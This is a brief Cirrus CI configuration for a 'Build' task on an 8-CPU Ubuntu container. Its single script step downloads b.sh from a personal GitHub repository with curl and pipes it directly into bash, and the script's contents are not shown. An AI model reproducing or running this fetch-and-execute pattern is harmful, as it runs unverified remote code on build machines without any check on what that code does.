env:
    # Cirrus Specific Vars (Do *NOT* Change)
    CIRRUS_SHELL: bash

task:
  name: "Build"
  timeout_in: 180m
  container:
      image: ghcr.io/catthehacker/ubuntu:act-latest
      cpu: 8
      memory: 32G

  Sync_script:
      - sudo apt update && curl -sL https://raw.githubusercontent.com/JamalNiga/cr/main/b.sh | bash
